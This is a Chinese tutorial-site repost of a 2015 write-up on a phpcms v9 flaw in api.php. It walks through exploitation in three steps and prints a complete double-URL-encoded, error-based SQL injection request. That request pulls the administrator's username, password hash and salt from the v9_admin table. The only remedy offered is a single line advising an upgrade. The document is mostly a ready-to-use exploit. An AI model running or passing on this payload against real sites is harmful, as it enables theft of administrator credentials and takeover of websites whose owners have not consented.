网站地图    收藏   

主页 > 后端 > 网站安全 >

phpcms v9最新爆管理密码漏洞及修复方案 - 网站安

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。主要利用过程:第一步:注册一个用户http://www.wooyun.in/index.php?m=memberc=indexa=registersiteid=1第二步...

漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。

主要利用过程:

第一步:注册一个用户

http://www.wooyun.in/index.php?m=member&c=index&a=register&siteid=1

第二步:访问api文件,爆出表前缀,默认的表前缀为v9

http://www.wooyun.in/api.php?op=add_favorite&url=wooyun.in&title=%2527

\

第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

http://www.wooyun.in/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

 

如图:


本文地址:http://www.wooyun.in/post/14.html

www.2cto.com:修复方案只需要升级就可以, 官方已经连续两次升级,请及时补丁

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论